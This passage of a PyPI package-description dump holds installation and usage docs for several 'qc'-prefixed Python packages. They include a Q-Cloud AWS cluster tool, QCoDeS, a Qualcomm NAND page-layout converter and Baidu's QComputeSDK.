us-east-1\nCognitoUserPoolId us-east-1_KbkdtpKpW\nCognitoAppClientId 2mgcn0o8fkakboq7jnqs6bd6ee\nApiGatewayId fkkxolpuo4Cluster users will need to install and configure the command line interface (CLI):python3 -m pip install qcloud_userthis will install the qcloud command into their python environment and this can be configured\nby running the following command and entering the values from theqcloud_setup --userinfocommandqcloud --configureThe first time a user interacts with the cluster they will need to enter the temporary\npassword emailed to them before resetting their password.See the README.md file distributed with the qcloud_user module for further\ndetails on interacting with the server.Suspending a ClusterIt is possible to shut down the cluster head node and restart it at a later\ntime in order to minimise the running costs. If you plan to restart the\ncluster, make sure to keep copies of the configuration file, ssh key (.pem\nfile) and activation key.Use the--suspendoption to delete only the cluster stack. You will be prompted\nif you want to delete the stack, type 'y' to confirm.qcloud_setup --suspend\nDelete stack qcloud-cluster? [y/N] yThis terminates the head node, but leaves the API gateway and Cognito stacks\nrunning, using minimal resources. Once the cluster has been deleted, the\nresults of previous jobs can still be accessed via the API gateway as these are\narchived in an S3 bucket. You will, of course, be unable to submit further\njobs until the cluster has been restarted.To re-launch the cluster, issue the following command in the same directory as\nthe configuration and license files:qcloud_setup --launch \nqcloud_setup --activation-key XXXX-XXXX-XXXX-XXXX-XXXXNote:In order to restart a cluster, you must have configured the cluster to\nuse an elastic IP (EIP) address allocated to your AWS account. This EIP must be\navailable for reuse when re-launching the cluster, otherwise the Q-Chem license\nwill no longer be valid.If you need to update the EIP of your host, please contact our support team atsupport@q-chem.comfor assistance.Teminating a clusterBefore terminating a cluster, ensure there are no jobs running in the queue and\nthat you have downloaded the results of any calculations you wish to keep. The\nfollowing command will delete the cluster:qcloud_setup --deleteYou will be asked whether you want to delete each of the 3 stacks,\nand you should type 'y' for each.To clean up all the resources allocated to the cluster, be sure to release the\nelastic IP address and clean out any files created in the S3 bucket.Other optionsAdditional options for the setup script can be printed via:qcloud_setup --help\nqcloud_setup --info\nqcloud_setup --listYou can also open an ssh connection to the head node using the following:qcloud_setup --shellCostsThe costs associated with running the cluster hardware will be dominated by the\ncompute nodes used to run calculations. These costs depend on the type of node\nand the region configured during setup and can be estimated using theAWS Cost Estimator.In addition to the compute-node costs, there are overhead costs associated with\nrunning the head-node used for job submissions which will be incured even if\nthere are no running jobs. A low-cost T2 instance is used for this purpose and\nwill attract a monthly cost of around $10, depending on the ammount of job\nstorage selected at setup time.The costs associated with the head-node can be minimized by suspending the\ncluster when not in use. If this is done, there will still be a residual\ncharge for maintining the elastic IP which is required for licensing. This\ncost is approximately $3.65 per month.Note: These costs are managed by AWS and will be charged to the account used\nto launch the Q-Cloud cluster, they are separate from the Q-Cloud subscription\nfee which is charged by Q-Chem Inc.To monitor the costs associated with the cluster, the following will\ngive a summary of the costs recorded for the last 28 days:qcloud_setup --costsYou can also set notifications for when expenditure reaches 75% and 99% of\na specified budget, or when the expenditure is predicted to exceed the\nbudgeted figure:qcloud_setup --set-budget nwhere n is a integer number of USD.Note: Currently these cost settings appliy to the entire AWS account.TroubleshootingWhen launching the cluster, if you receive permission problems associated\nwith lambda functions, check to ensure that the IAM policy (QCloudIamPolicy) has been\ncreated in the same region as the cluster.When submitting jobs, a job ID should be returned. This is a random\nsequence of 12 alphanumeric characters associated with your job. If you do\nnot see a job ID, it is possible the submit function has not been updated\nwith the instance ID of the head node. Re-run the launch command to trigger\nthis update:qcloud_setup --launchIf you encounter any problems not covered here, please contact our support team atsupport@q-chem.comfor assistance."} +{"package": "qcloudsms", "pacakge-description": "\u817e\u8baf\u4e91SMS Python3 SDK\u4ee3\u7801\u4fee\u6539\u81ea\uff1asamhjn/qcloudsms-python3\u5b98\u65b9SDK\u4f7f\u7528\u6837\u4f8b\u3002\u9879\u76ee\u521d\u5fc3\u76ee\u6807\u662f\u521d\u59cb\u5316\u540e\u7acb\u5373\u53ef\u4ee5\u4f7f\u7528\u5c1d\u8bd5\u7528\u5f88\u7b80\u5355\u7684\u4ee3\u7801\u5b8c\u6210\u7edd\u5927\u90e8\u5206\u529f\u80fd\u3002\u5728\u539f\u6709\u9879\u76ee\u4e0a\uff0c\u4e3b\u8981\u505a\u4e86\u4ee5\u4e0b\u53d8\u66f4\uff1a\u5220\u9664\u4e86\u8bed\u97f3\u8fd9\u4e9b\u5f88\u5c11\u7528\u5230\u7684\u4e1c\u897f\uff0c\u53d8\u66f4\u4e86\u539f\u4ee3\u7801\u4e2d\u4e0d\u5408\u9002\u7684class \u547d\u540d\u4f7f\u7528python3\u7684 requests \u6765\u53d1\u9001\u8bf7\u6c42\u6dfb\u52a0\u4e86 demo \u6587\u4ef6\uff0c\u539f\u6765\u4ee3\u7801\u7684 demo \u8dd1\u4e0d\u8d77\u6765\u7528\u6cd5\u8bf7\u53c2\u8003 demo.py \u6587\u4ef6"} +{"package": "qcloudsms-py", "pacakge-description": "No description available on PyPI."} +{"package": "qcloud-tim", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qcloud-user", "pacakge-description": "Q-Cloud User DocumentationSetupBefore submitting any calculations, you will need to install and configure\nthe Q-Cloud command line interface:python3 -m pip install qcloud_user\nqcloud --configureYou will be prompted for several configuration values that can be obtained from\nyour Q-Cloud administrator. You should have received an email with an initial\npassword for your account, and you will be prompted to change this the first\ntime you attempt to submit a job.Job ControlSubmitting JobsUse the--submitoption to submit Q-Chem jobs to the cluster, e.g.:qcloud --submit job1.inp job2.inp [...]Several jobs can be submitted at the same time and they will be submitted with\nthe default queue parameters. If there are no compute nodes available, the\njobs will sit in the QUEUED state for a couple of minutes while a fresh compute\nnode is launched and configured. Once the queue has cleared, the compute nodes\nwill automatically shut down after the configure time frame (default is five minutes).Jobs will be submitted with the default queue parameters. To override the\ndefault parameters and/or specify additional parameters, add them to the first\nline of the Q-Chem input file. For example, the following limits the job to 1\nhour:--time=1:00:00\n$molecule\n0 1\nhe\n$end\n$rem\n...The number of threads can be specified by using the--ncpuflag, for example:qcloud --submit --ncpu 4 job1.inpNote that if the number of threads specified exceeds the number of cores on\nan individual compute node, the job will not run. Your QCloud administrator\nwill be able to inform you what this limit is.If the job submission is successful, a unique job identifier will be returned:[\u2713] Submitted job id gv6uqutvNmU0: heliumA local registry of these IDs is kept, so it is not essential to use them in the\ncommands below. However, they may be required to disambiguate multiple jobs\nsubmitted with the same input file basename.Monitoring JobsTo monitor the progress of jobs, use the--statusoption along with a string,\nwhich could be the file name, job ID or substring:qcloud --status The progress of jobs in the RUNNING state can be obtained using:qcloud --tail A job in the QUEUED or RUNNING state can be cancelled, which will remove it from the queue:qcloud --cancel Downloading ResultsOnce a job in in the ARCHIVED state, it can be downloaded from the S3 bucket onto\nthe local machine:qcloud --get The download will create a new directory with the same basename as the input file\ncontaining the output from the calculation.Jobs in the DOWNLOADED state can be cleared from the job registry on the local machine:qcloud --clear Note that this does not remove the results from the S3 bucket.\nIf you want to remove the job from the registry regardless of status, use the--removeoption.Other commandsThe following will give a full list of commands available using the CLI:qcloud --helpTroubleshootingIf you encounter additional problems not covered in this guide, please contact your\nQ-Cloud administrator or emailsupport@q-chem.comfor assistance."} +{"package": "qcloud_video", "pacakge-description": "UNKNOWN"} +{"package": "qcmapper", "pacakge-description": "No description available on PyPI."} +{"package": "qcmaskingcode", "pacakge-description": "UNKNOWN"} +{"package": "qcmd", "pacakge-description": "![CI](https://github.com/libanvl/python-qcmd/workflows/CI/badge.svg)\n[![PyPI version](https://badge.fury.io/py/qcmd.svg)](https://badge.fury.io/py/qcmd)# python-qcmd\nSynchronous concurrent executor command queueing for Python 3.8# Developing\n## Install pipx if pipenv is not installed\npython3 -m pip install pipx\npython3 -m pipx ensurepath## Install pipenv using pipx\npipx install pipenv## Init\nbash init.shMIT LicenseCopyright (c) 2020 libanvl.devPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \u201cSoftware\u201d), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \u201cAS IS\u201d, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE."} +{"package": "qc-metric-aggregator", "pacakge-description": "qc-metric-aggregatorParse individual metrics out of a directory of QC results for genomic data and output a report containing the desired metrics and the overall PASS/FAIL status of the sample.Installationpip install qc-metric-aggregatorUsageusage: aggregate-qc-metrics [-h]\n sample_name metrics_dir output_file threshold_file\n\npositional arguments:\n sample_name The sample name or id for which the QC metrics apply\n metrics_dir The directory to search for metric files, often a cromwell\n run directory\n output_file File path to store the finalized mertrics TSV\n threshold_file Path to the yml thresholds file to validate against\n\noptional arguments:\n -h, --help show this help message and exitExample invocation:aggregate-qc-metrics HG00096 /opt/qc/results/HG00096/WholeGenomeSingleSampleQc /opt/qc/scores/qc_results.tsv thresholds.ymlOutput formatsComing soon...Threshold fileYou will need to pass in a YAML file containing pass/fail threshold tests for the metrics you are interested in. The file format consists of a list of objects each containing the following keys:KeyValueCommentsmetric_nameName of the metric to checkThis can be anysupported metricand should be the value returned byname.operatorWhich operation to use to compare the metric value to the PASS/FAIL threshold<,<=,>,>=, and=are all supported. If you instead specifyreportthe metric will be reported in the final output, but not factored into the PASS/FAIL status.valueThe PASS/FAIL threshold to compare the metric value toThis field is optional ifreportis specified for theoperator.An example can befound hereSupported MetricsNameDescriptionOriginating ToolFREEMIXFreemixVerifyBamId2Q20_BASESTotal bases with Q20 or higherPicard CollectQualityYieldMetricsMEAN_COVERAGEHaploid CoveragePicard CollectWgsMetricsPCT_10XPercent coverage at 10xPicard CollectWgsMetricsPCT_20XPercent coverage at 20xPicard CollectWgsMetricsPCT_30XPercent coverage at 30xPicard CollectWgsMetricsPCT_CHIMERASPercent chimeras (PAIR)Picard CollectAlignmentSummaryMetricsREAD1_PF_MISMATCH_RATERead 1 base mismatch ratePicard CollectAlignmentSummaryMetricsREAD2_PF_MISMATCH_RATERead 2 base mismatch ratePicard CollectAlignmentSummaryMetricsMEDIAN_INSERT_SIZELibrary insert size medianPicard CollectInsertSizeMetricsMEDIAN_ABSOLUTE_DEVIATIONLibrary insert size madPicard CollectInsertSizeMetricsPERCENT_DUPLICATIONPercent duplicate marked readsPicard CollectDuplicateMetricsMEAN_TARGET_COVERAGEThe mean coverage of a target region.Picard CollectHsMetricsPCT_TARGET_BASES_10XThe fraction of all target bases achieving 10X or greater coveragePicard CollectHsMetricsPCT_TARGET_BASES_20XThe fraction of all target bases achieving 20X or greater coveragePicard CollectHsMetricsPCT_TARGET_BASES_30XThe fraction of all target bases achieving 30X or greater coveragePicard CollectHsMetricsAdding Additional MetricsTo add support for additional metrics you simply need to subclassMetricand register it inAvailableMetricsBecause many QC metrics are output in TSV format, there is a helper classTSVMetricthat you can inherent from in addition toMetricthat will make that easier. All of the currently supported metrics use this helper, so you should be able to look to them for examples."} +{"package": "qcm-parser", "pacakge-description": "QCM parserIt's a basic and quite strict QCM (Multiple Choices Questions) parser.It parses a file .md file into Python objects.\nThat's all.There's no rendering, no export. It must be done separetaly.InstallationIt requires python>=3.7 andmarkdownpackage.$pipinstallqcm_parserUsageIn your script :fromqcm_parser.parserimportParseQCMqcm=ParseQCM.from_file(\"my_qcm_file.md\")print(qcm)Will display your QCM as a text.In memory, youqcmobject is represented as a tree which holds parts.Those parts holds questions, holding answers.It is then easy to navigate through it like this :print(qcm.title)\nfor part in qcm.parts:\n print(part.title)\n print(part.text)\n for question in part.questions:\n print(question.title)\n print(question.text)\n for answer in question.title:\n print(answer.answer)ModesThere's 2 modes :for web export (qcm_part.from_file(filename, mode=\"web\")), the default one,modenamed parameter can be ommitted.for pdf export (qcm_part.from_file(filename, mode=\"pdf\")).Themode=webshould be used if you want to serve a QCM like I dohereIt replacesmarkdownsyntax withhtmlsyntax usingmarkdownmodule.Themode=pdfcan be used to create a randomized QCM in a .md file, then to export it with pandoc.QCM file descriptionFiles should be utf-8 encoded text files with .md extensions.They should respect theexampleformat :# title## partthe text of the part### question with multiple choicesoptional sub text. Can contains code, latex, whatever- [x]right answer- [ ]wrong answer a- [ ]wrong answer b### question with text allowed-[t]Known limitationsOnly a little subset of markdown is supported.A title must be foundtitle, parts and questions can't have empty string after#,##or###tag## valid part\n\n##\nwrong partCode blocks with triple backticks are supported not~~~. Those will creates bugs.# title## part### question```python# commentdeff():return1```is valid.but :# title## part### question```python# commentdeff():return1```**is not valid.**\n\nThe `# comment` line will be interpreted as a new title etc."} +{"package": "qcm-sdk", "pacakge-description": "No description available on PyPI."} +{"package": "qc_nester", "pacakge-description": "No description available on PyPI."} +{"package": "qcnlp", "pacakge-description": "No description available on PyPI."} +{"package": "qcnpy", "pacakge-description": "qcnpyQuantum Circuit Network"} +{"package": "qcobj", "pacakge-description": "QCOBJQCOBJ a Python package to handle quantity-aware configuration filesIn shortA Python package to help scientists and researchers to add physical quantities\nto the configuration files they use in their computer programs.\nHighlights:Parameter values are validated against user defined specifications to\nensure they are in the correct range and eventually converted to the\nrequested unit of measurement.A graphical user interface to display and modify configuration file content\nis included.More than two configuration files can be compared highlighting the\ndifferences between them.Install QCOBJQCOBJ can be installed without the graphical user interface:pip3 install git+https://bitbucket.org/bvidmar/qcobjor with the GUI:pip3 install git+https://bitbucket.org/bvidmar/qcobj[with_pyside2]orpip3 install git+https://bitbucket.org/bvidmar/qcobj[with_pyqt5]QCOBJ was published onSoftwareX, Volume 7, January\u2013June 2018, Pages 347-351.Where is the documentation?Here!Who do I talk to?Roberto VidmarNicola Creati"} +{"package": "qcode", "pacakge-description": "No description available on PyPI."} +{"package": "qcodes", "pacakge-description": "QCoDeSQCoDeS is a Python-based data acquisition framework developed by the\nCopenhagen / Delft / Sydney / Microsoft quantum computing consortium.\nWhile it has been developed to serve the needs of nanoelectronic device\nexperiments, it is not inherently limited to such experiments, and can\nbe used anywhere a system with many degrees of freedom is controllable\nby computer.\nTo learn more about QCoDeS, browse ourhomepage.To get a feeling of QCoDeS read15 minutes to QCoDeS,\nand/or browse the Jupyter notebooks indocs/examples.QCoDeS is compatible with Python 3.9+ (3.9 soon to be deprecated). It is\nprimarily intended for use from Jupyter notebooks, but can be used from\ntraditional terminal-based shells and in stand-alone scripts as well. The\nfeatures inqcodes.utils.magicare exclusively for Jupyter notebooks.Default branch is now mainThe default branch in QCoDeS has been renamed to main.\nIf you are working with a local clone of QCoDeS you should update it as follows:Rungit fetch originandgit checkout mainRungit symbolic-ref refs/remotes/origin/HEAD refs/remotes/origin/mainto update your HEAD reference.InstallIn general, refer toherefor installation.DocsRead ithere.\nDocumentation is updated and deployed on every successful build in main.We use sphinx for documentations, makefiles are provided both for\nWindows, and *nix, so that you can build the documentation locally.Make sure that you have the extra dependencies required to install the docspipinstall-rdocs_requirements.txtGo to the directorydocsandmakehtmlThis generate a webpage, index.html, indocs/_build/htmlwith the\nrendered html.QCoDeS LoopThe modulesqcodes.data,qcodes.plots,qcodes.actions,qcodes.loops,qcodes.measure,qcodes.extensions.slackandqcodes.utils.magicthat were part of QCoDeS until version 0.37.0.\nhave been moved into an independent package called qcodes_loop.\nPlease see it\u2019srepositoryanddocumentationfor more information.For the time being it is possible to automatically install the qcodes_loop\npackage when installing qcodes by executingpip install qcodes[loop].Code of ConductQCoDeS strictly adheres to theMicrosoft Open Source Code of ConductContributingThe QCoDeS instrument drivers developed by the members of\nthe QCoDeS community but not supported by the QCoDeS developers are contained inhttps://github.com/QCoDeS/Qcodes_contrib_driversSeeContributingfor general information about bug/issue\nreports, contributing code, style, and testing.LicenseSeeLicense."} +{"package": "qcodes-contrib-drivers", "pacakge-description": "This repository contains QCoDeS instrument drivers developed by members of the QCoDeS community.\nThese drivers are not supported by the QCoDeS developers but instead supported on a best effort basis\nby the developers of the individual drivers.Default branch is now mainThe default branch in qcodes_contrib_drivers has been remamed to main.\nIf you are working with a local clone of qcodes_contrib_drivers you should update it as follows.Rungit fetch originandgit checkout mainRungitsymbolic-refrefs/remotes/origin/HEAD refs/remotes/origin/mainto update your HEAD reference.Getting startedPrerequisitesThe drivers in this repository work with and heavily depend on QCoDeS. Start by installingQCoDeS.InstallationInstall the contrib drivers withpippip install qcodes_contrib_driversDrivers documentationThe documentations of the drivers in this repository can be readhere.ContributingThis repository is open for contribution of new drivers,\nas well as improvements to existing drivers. Each driver should\ncontain an implementation of the driver and a Jupyter notebook showing how the\ndriver should be used. In addition we strongly encourage writing tests for the drivers.\nAn introduction for writing tests with PyVISA-sim can be found in the QCoDeS documentation linked\nbelow.Drivers are expected to be added toqcodes_contrib_drivers/drivers/MakerOfInstrument/folder\nwhile examples should be added to thedocs/examplesfolder and tests placed in theqcodes_contrib_drivers/tests/MakerOfInstrumentfolder. Please follow naming conventions for\nconsistency.For general information about writing drivers and how to write tests refer to theQCoDeS documentation.\nEspecially the exampleshereare useful.LICENSEQCoDeS-Contrib-drivers is licensed under the MIT license except theTektronix AWG520andTektronix Keithley 2700drivers which are licensed under the GPL 2 or later License."} +{"package": "qcodes-loop", "pacakge-description": "qcodes_loopcontains modules that used to be part of QCoDeS but were deprecated and removed in the spring of 2023.\nThe last QCoDeS release supporting usage of theLoopand associated modules wasv0.37.0.The modules in question are:qcodes_loop.data,qcodes_loop.plots,qcodes_loop.actions,qcodes_loop.loops,qcodes_loop.measure,qcodes_loop.extensions.slackandqcodes_loop.utils.magicThe code in this repository is provided as-is but not actively maintained by the QCoDeS developers.\nWe are happy to merge bug fixes contributed but no active development on this code is planned.Please reach out to the QCoDeS development team if you are interested in maintaining this code repository."} +{"package": "qcom-nandc-pagify", "pacakge-description": "AboutThe Qualcomm NAND controller takes care of writing and reading pages from\nthe actual NAND flash chip. It uses a non-standard page layout which splits\nthe data in smaller partitons and saves these as chunks with ECC, bad block\nmarkers and padding over the data+oob area of the nand pages.The qcom-nandc-pagify can help to convert a raw image (e.g. Linux, rootfs, \u2026)\nin the page format which is used by the NAND controller. This can then be used\nwith a NAND flash programmer to initialize the NAND flash chip.Known NAND controllers which should work the same way are:qcom,ipq806x-nandqcom,ipq4019-nandqcom,ipq6018-nand (tested)qcom,ipq8074-nand (tested)qcom,sdx55-nandUsageBuildThe package is PEP517 compatible and can be build using python3-build:python3 -m buildThe generated wheel then be installed via pip:dist/qcom_nandc_pagify-*-py3-none-any.whlBut the build is not necessary when all dependencies are already installed\non the system. Then it is possible to directly run in from the source\ndirectory:python3 -m qcom_nandc_pagifyUnittestThere are a couple of testcases intests/resources. Thein-*files\nare converted to theout-*files with various parameters. These should\nreflect common scenarios. The complete unittest can be run via:python3 -m unittestInstallationIt can be installed using pipfrom PyPI:python3 -m pip install --upgrade qcom-nandc-pagifyOr from the the own build wheel (see avove):python3 -m pip install --upgrade dist/qcom_nandc_pagify-*-py3-none-any.whlConverting an imageThe arguments are explained as part of the usage help output:qcom_nandc_pagify -hIt is necessary specify an input file and the output file + a couple of\nflash dependent parameters:# NAND device with 2048+128 large pages with BCH4 (e.g. for Cypress), 8x bus\nqcom-nandc-pagify --infile $INPUT --outfile $OUTPUT --pagesize 2048 --oobsize 128 --ecc bch4\n\n# NAND device with 2048+64 large pages with RS (e.g. for IPQ806x), 8x bus\nqcom-nandc-pagify --infile $INPUT --outfile $OUTPUT --pagesize 2048 --oobsize 64 --ecc rs\n\n# NAND device with 2048+64 large pages with RS_SBL (e.g. for IPQ806x, SBL partition), 8x bus\nqcom-nandc-pagify --infile $INPUT --outfile $OUTPUT --pagesize 2048 --oobsize 64 --ecc rs_sbl\n\n# NAND device with 4096+256 large pages with BCH8 (e.g. Cypress/Hawkeye), 8x bus\nqcom-nandc-pagify --infile $INPUT --outfile $OUTPUT --pagesize 4096 --oobsize 128 --ecc bch8Physical layoutPage LayoutThe data which should be saved in a page is split into 516 byte portions. Only\nthe last portion is smaller - 510 bytes of 2048 byte large pages and 484 bytes\nfor 4096 byte pages. But even the last portion is saved like it would have\nbeen 516 bytes long. The remaining bytes are simply filled with 0xff.Each data portion is saved with additional data as chunk in the NAND page.Usually, there are more bytes in the page then chunks. For example,\na 2048 bytes page with 128 bytes OOB will be split like this for 4-bit BCH ECC:516 bytes => 528 bytes for chunk in NAND516 bytes => 528 bytes for chunk in NAND516 bytes => 528 bytes for chunk in NAND510 bytes => 528 bytes for chunk in NANDThis would leave 64 bytes of the 2176 bytes (2048 + 128) uninitialized. But\nthe remaining bytes in the page can simply filled up with 0xff to make sure\nthat the page has the correct size in the converted image.More information about the page layout can be found in Linux\u2019sqcom_qcom_nandc.cunderqcom_nand_ooblayout_ecc()Chunk layoutA chunk is a complex structure withfirst data partbad block marker (1 byte on 8x wide bus, 2 byte on 16x wide bus)second data part (+padding)ECC datapaddingThe first data part and second data part are simply split by a BBM which is\nadded to each chunk - even when it is not used at all. The position of this\nBBM is chosen so that the BBM in the last chunk is at the beginning of the\nOOB region of the flash. This means as size for the first data part:2048 bytes page, 528 byte chunk: 4642048 bytes page, 532 byte chunk: 4524096 bytes page, 528 byte chunk: 4004096 bytes page, 532 byte chunk: 372The size of the ECC data depends on the used algorithm. Following are known4-Bit BCH, 8x bus: 7 bytes ECC4-Bit BCH, 16x bus: 8 bytes ECC8-Bit BCH, 8x bus: 13 bytes ECC8-Bit BCH, 16x bus: 14 bytes ECCRS: 10 bytes ECCThe chunk is then filled up with 0xff to make sure that it has a predefined\nsize. These size itself depends on the ECC algorithm:4-Bit BCH: 528 byte chunk8-Bit BCH: 532 byte chunkRS: 528 byte chunkMore information about the chunk layout can be found in Linux\u2019sqcom_qcom_nandc.cunderqcom_nandc_read_cw_raw().IPQ806x SBL pagesThe pages for the secondary bootloader on the IPQ806x didn\u2019t had a data\nsize of 516 bytes per chunk. Instead the data was written in 512 byte chunks\nwith Reed-Solomon ECC. A chunk will use 532 bytes (1 byte BBM, 10 bytes ECC, 5\nbytes padding). The rest of the rules from above still apply.ECCBCHThe polynomial used for calculating the data is 8219 or:x**13 + x**4 + x**3 + x**1 + 1RSThe used polynomial for GF(2**10) is 1033 or:x ** 10 + x ** 3 + 1The generator (first consecutive root) is:[1, 510, 51, 323, 663, 928, 58, 587, 836]The data itself is encoded with(1015 - chunk_data_size)0 bytes at the\nbeginning. The resulting 8 10 bit values are reversed, concatenated to a\nsingle 80 bits string and split again into 8 bits portions for storage on the\nNAND.RemarksThere is currently no official documentation from QCA regarding the NAND\ncontroller. Only available devices could be used to analyze the NAND content.\nFollowing features could not yet be tested:Reed Solomon ECC on modern devices4K pageswide bus mode"} +{"package": "qcompress", "pacakge-description": "DescriptionQCompress is a Python framework for the quantum autoencoder (QAE) algorithm. Using the code, the user can execute instances of the algorithm on either a quantum simulator or a quantum processor provided by Rigetti Computing\u2019sQuantum Cloud Services. For a more in-depth description of QCompress (including the naming convention for the types of qubits involved in the QAE circuit), clickhere.For more information about the algorithm, seeRomero et al. Note that we deviate from the training technique used in the original paper and instead introduce two alternative autoencoder training schemes that require lower-depth circuits (seeSim et al).FeaturesThis code is based on an olderversionwritten during Rigetti Computing\u2019s hackathon in April 2018. Since then, we\u2019ve updated and enhanced the code, supporting the following features:Executability on Rigetti\u2019s quantum processor(s)Several training schemes for the autoencoderUse of theRESEToperation for the encoding qubits (lowers qubit requirement)User-definable training circuit and/or classical optimization routineInstallationThere are a few options for installing QCompress:To install QCompress usingpip, execute:pipinstallqcompressTo install QCompress usingconda, execute:condainstall-crigetti-chsim13372qcompressTo instead install QCompress from source, clone this repository,cdinto it, and run:gitclonehttps://github.com/hsim13372/QCompresscdQCompresspython-mpipinstall-e.Try executingimport qcompressto test the installation in your terminal.Note that the pyQuil version used requires Python 3.6 or later. For installation on a user QMI, please clickhere.ExamplesWe provide several Jupyter notebooks to demonstrate the utility of QCompress. We recommend going through the notebooks in the order shown in the table (top-down).NotebookFeature(s)qae_h2_demo.ipynbSimulates the compression of the ground states of the hydrogen molecule. Uses OpenFermion and grove to generate data. Demonstrates the \u201chalfway\u201d training scheme.qae_two_qubit_demo.ipynbSimulates the compression of a two-qubit data set. Outlines how to run an instance on an actual device. Demonstrates the \u201cfull with reset\u201d training scheme.run_landscape_scan.ipynbShows user how to run landscape scans for small (few-parameter) instances. Demonstrates setup of the \u201cfull with no reset\u201d training scheme.DisclaimerWe note that there is a lot of room for improvement and fixes. Please feel free to submit issues and/or pull requests!How to citeWhen using QCompress for research projects, please cite:Sukin Sim, Yudong Cao, Jonathan Romero, Peter D. Johnson and Al\u00e1n Aspuru-Guzik.A framework for algorithm deployment on cloud-based quantum computers.arXiv:1810.10576. 2018.AuthorsSukin (Hannah) Sim(Harvard),Zapata Computing, Inc."} +{"package": "qcompute", "pacakge-description": "English |\u7b80\u4f53\u4e2d\u6587Quantum Leaf (in Chinese: \u91cf\u6613\u4f0f) - QComputeSDKFeaturesInstallEnvironment SetupInstall QComputeSDKRun ExampleBreaking ChangeIntroduction and DevelopmentsTutorialsAPI DocumentationDevelopmentDiscussion and FeedbacksDevelop with QComputeSDKFrequently Asked QuestionsCopyright and LicenseQuantum Leafis the world's first cloud-native quantum computing platform developed by theInstitute for Quantum Computing at Baidu Research. Users can use the Quantum Leaf for quantum programming, quantum simulation and running real quantum computers. Quantum Leaf aims to provide a quantum foundation development environment for QaaS (Quantum infrastructure as a Service).The QComputeSDK installation package is a complete open-source quantum computing framework implemented in Python. It adopts the classic quantum hybrid programming method and presets various advanced modules. Users can use the quantum environment object (QEnv) to quickly build quantum circuits, and can also use it to develop various complex quantum algorithms. QComputeSDK has multiple interfaces for local simulators, cloud simulators and real machines, allowing users to quickly simulate and verify quantum algorithms in local, and submit circuit tasks to real quantum hardware (superconductors, ion traps) or high-performance simulators on cloud.FeaturesEasy-to-useNearly 50 tutorial cases, and still increasing.Quantum circuit local visualization.Automatically call modules to complete quantum circuit compilation.VersatileSupport quantum circuit modularization.The local high-performance simulator supports the simulation of 32 qubits.The high-performance heterogeneous simulators on the cloud supports more qubit simulations.Support the simulation of various quantum noise models.Local GPU simulator based on NVIDIA cuQuantum.Local photonic quantum simulator supports the Gaussian/Fork state.Real quantum computing powerAccess to QPUQian, Baidu's superconducting quantum computer.Access to IonAPM, the ion trap quantum computer of the Innovation Academy for Precision Measurement Science and Technology, CAS.Access to IoPCAS, the superconducting quantum computer of the Institute of Physics, CAS.InstallEnvironment SetupWe recommend using conda to manager virtual environments,condacreate-nqcompute_envpython=3.10\ncondaactivateqcompute_envPlease refer toAnaconda's official installation.Note: Python version >= 3.9Install QComputeSDKInstall QComputeSDK withpip,pipinstallqcomputeor download all the files to install from sources. We recommend this installation. You can download from GitHub,gitclonehttps://github.com/baidu/QCompute.gitcdQCompute\npipinstall-e.or download from Gitee,gitclonehttps://gitee.com/baidu/qcompute.gitcdqcompute\npipinstall-e.Run ExampleIf all the files have been downloaded, you can now try to run a program to verify whether the installation is successful. Here we run the test script provided by QComputeSDK,python-mTest.PostInstall.PostInstall_testUser Token needs to be given on the command line before cloud testing, You can log in toQuantum Leafto check your Token. If you don't need to do cloud testing, please typeCtrl+c.Note: Please skip this step if you installed withpip.Breaking ChangeStarting with QComputeSDK 3.0.0, developers can run Baidu's superconducting quantum computer through QComputeSDK (device identifier:CloudBaiduQPUQian). The device provides services regularly, which can be viewed from theServices Status.Introduction and DevelopmentsTutorialsQComputeSDK is a quantum computing development framework that implements backend access to real quantum hardware. It builds a bridge between quantum computing and quantum hardware, providing strong support for the research and development of quantum algorithms and applications, and also providing a wealth of cases for developers to learn from.Here we provide primary, intermediate and advanced cases. With primary case, you can quickly get started with QComputeSDK, it includes quantum state preparation, classical quantum hybrid programming, circuit task submission to quantum computers, etc. The intermediate case is the use of QComputeSDK, including the calling of modules, the use of convertors, etc. The advanced case is the implementation of advanced quantum algorithms on QComputeSDK. We have provided detailed tutorial documents for these algorithms.Primary CasesGHZ state preparation (local)GHZ state preparation (cloud)Bell state preparation (local)Bell state preparation (cloud)Classical quantum hybrid language (local)Classical quantum hybrid language (cloud)Classical quantum information interaction (local)Classical quantum information interaction (cloud)QPU - BaiduQPUQianQPU - IonAPMQPU - IoPCASPhotonic quantum circuit simulation based on Fock statePhotonic quantum circuit simulation based on Gaussian stateGPU simulator based on cuQuantumUniversal blind quantum computationQuantum Noise SimulationAdding noise to the circuitQuantum noise compression moduleOne-qubit circuit with noise simulationNoise simulation with multiple processesTwo-qubit circuit with noise simulationIntermediate CasesOutput Information SettingsTutorialResults printing information settingsOutput file automatic cleaningGeneral ModulesTutorialModule usage examplesQuantum circuit inverse moduleQuantum circuit reverse moduleQuantum procedure unroll moduleQuantum gate decomposition moduleQuantum gate compression moduleConvertorsTutorialCircuit serializationConsole drawingConvert circuit serialization and deserializationConvert circuit to JSONConvert circuit to QASMConvert circuit to QOBJConvert circuit to IonQConvert circuit to XanaduAdvanced CasesQuantum Superdense CodingDeutsch-Jozsa AlgorithmQuantum Phase Estimation (QPE)Grover's Search AlgorithmShor's AlgorithmVariational Quantum Eigensolver (VQE)Variational Quantum State Diagonalization (VQSD)In recent updates, QComputeSDK has added a photonic quantum computing simulator (LocalBaiduSimPhotonic). Unlike traditional quantum circuit, photonic quantum computing has its own unique way of running. QComputeSDK supports the optical system on the architecture, and also becomes the first quantum development kit that integrates quantum computing and photonic quantum 